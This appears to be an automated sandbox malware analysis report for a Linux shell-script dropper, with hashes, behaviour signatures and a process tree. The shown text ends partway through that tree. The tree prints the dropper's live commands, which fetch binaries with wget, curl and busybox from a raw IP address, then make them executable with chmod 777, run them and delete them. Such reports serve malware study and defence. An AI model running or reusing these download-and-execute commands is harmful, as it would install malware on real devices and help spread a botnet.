c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1

Analysis

max time kernel
35s
max time network
76s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21-11-2024 08:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
Size

10KB
MD5

bb029aab8a7891c04069f60088312995
SHA1

515224677ec506e44a6d344ff8edf84789fc08ea
SHA256

c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1
SHA512

dd9af47bb73cbc6d79efb7139d78732d532d3acb06629a8834f98e836aa5cbd249409043331509946caf2469f9959bd3e481e7bfa1a30cb3575e283a17617356
SSDEEP

192:mI4f7nvXhnvXhnvX4ZX374oMaXDPHRHRHc9ZG8I4V7COtG6Lhh99lnzvXu76Gksx:ATv9v9vwHowBBc9Z9nW5K7WG56q2ne7K

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
702	chmod
903	chmod
799	chmod
927	chmod
868	chmod
880	chmod
892	chmod
909	chmod
718	chmod
784	chmod
830	chmod
850	chmod
874	chmod
921	chmod
776	chmod
813	chmod
856	chmod
886	chmod
915	chmod
684	chmod
695	chmod
733	chmod
844	chmod
862	chmod
750	chmod
768	chmod
838	chmod
933	chmod

Executes dropped EXE 28 IoCs

Processes:

SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJWvjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg0xAUqBtxYzscUUXZytllctNeDQXesIeHFKOt7JbZTdWhqii4VfudCKQMf3wiR7bRg93pRdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mmyuFnig7SLqukn75LnZmw06l61kE18cmyJUD1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX5UsXnRC524zBEEk2TH0apfry8KrElbTlAHcy16I181L2h0oyuVrDTAgDwzqfZfDRTV4ObuMon2AQgX5XM3RlLtlmmqFNwKnUC5umrYHm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTxWIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0rfmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jvKB2adoRmT7A3D3lUQ4D65uW54MCsodafV6WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0rbuMon2AQgX5XM3RlLtlmmqFNwKnUC5umrYHm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTxfmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jvKB2adoRmT7A3D3lUQ4D65uW54MCsodafV60xAUqBtxYzscUUXZytllctNeDQXesIeHFKSdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJWvjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWgyuFnig7SLqukn75LnZmw06l61kE18cmyJUD1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX5UsXnRC524zBEEk2TH0apfry8KrElbTlAHcy16I181L2h0oyuVrDTAgDwzqfZfDRTV4OOt7JbZTdWhqii4VfudCKQMf3wiR7bRg93pRdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm

Checks CPU configuration 1 TTPs 28 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 56 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	curl
File opened for modification	/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	curl
File opened for modification	/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	curl
File opened for modification	/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	curl
File opened for modification	/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	curl
File opened for modification	/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	curl
File opened for modification	/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	curl
File opened for modification	/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	curl
File opened for modification	/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	curl
File opened for modification	/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	curl
File opened for modification	/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	curl
File opened for modification	/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	curl
File opened for modification	/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	curl
File opened for modification	/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	curl
File opened for modification	/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	curl
File opened for modification	/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	curl
File opened for modification	/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	curl
File opened for modification	/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	curl
File opened for modification	/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	curl
File opened for modification	/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	curl
File opened for modification	/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	curl
File opened for modification	/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	curl
File opened for modification	/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	curl
File opened for modification	/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	curl
File opened for modification	/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	curl
File opened for modification	/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	curl
File opened for modification	/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	curl
File opened for modification	/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	curl

/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
1⤵
PID:656
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:658
- /usr/bin/wget
  wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:660
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:671
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:680
- /bin/chmod
  chmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  ./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Executes dropped EXE
  PID:686
- /bin/rm
  rm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:687
- /usr/bin/wget
  wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:688
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:692
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:694
- /bin/chmod
  chmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  ./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Executes dropped EXE
  PID:696
- /bin/rm
  rm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:697
- /usr/bin/wget
  wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:698
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:699
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:700
- /bin/chmod
  chmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  ./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Executes dropped EXE
  PID:704
- /bin/rm
  rm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:705
- /usr/bin/wget
  wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:706
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:710
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:714
- /bin/chmod
  chmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  ./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Executes dropped EXE
  PID:719
- /bin/rm
  rm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:720
- /usr/bin/wget
  wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:730
- /bin/chmod
  chmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  ./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Executes dropped EXE
  PID:735
- /bin/rm
  rm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:736
- /usr/bin/wget
  wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:738
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:746
- /bin/chmod
  chmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  ./yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:753
- /usr/bin/wget
  wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:764
- /bin/chmod
  chmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  ./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Executes dropped EXE
  PID:769
- /bin/rm
  rm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:770
- /usr/bin/wget
  wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:772
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:775
- /bin/chmod
  chmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  ./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Executes dropped EXE
  PID:777
- /bin/rm
  rm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:778
- /usr/bin/wget
  wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:779
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:780
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:781
- /bin/chmod
  chmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  ./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Executes dropped EXE
  PID:785
- /bin/rm
  rm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:786
- /usr/bin/wget
  wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:787
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:792
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:796
- /bin/chmod
  chmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  ./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Executes dropped EXE
  PID:801
- /bin/rm
  rm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:802
- /usr/bin/wget
  wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:811
- /bin/chmod
  chmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  ./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:816
- /usr/bin/wget
  wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:817
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:828
- /bin/chmod
  chmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  ./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Executes dropped EXE
  PID:831
- /bin/rm
  rm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:833
- /usr/bin/wget
  wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:835
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:836
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:837
- /bin/chmod
  chmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  ./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Executes dropped EXE
  PID:839
- /bin/rm
  rm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:840
- /usr/bin/wget
  wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:841
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:843
- /bin/chmod
  chmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  ./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Executes dropped EXE
  PID:845
- /bin/rm
  rm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:846
- /usr/bin/wget
  wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:847
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:849
- /bin/chmod
  chmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - File and Directory Permissions Modification
  PID:850
- /tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  ./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Executes dropped EXE
  PID:851
- /bin/rm
  rm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:852
- /usr/bin/wget
  wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:853
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:855
- /bin/chmod
  chmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  ./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:858
- /usr/bin/wget
  wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:859
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:861
- /bin/chmod
  chmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  ./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Executes dropped EXE
  PID:863
- /bin/rm
  rm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:864
- /usr/bin/wget
  wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:865
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:867
- /bin/chmod
  chmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  ./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:870
- /usr/bin/wget
  wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:873
- /bin/chmod
  chmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  ./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:876
- /usr/bin/wget
  wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:877
- /usr/bin/curl
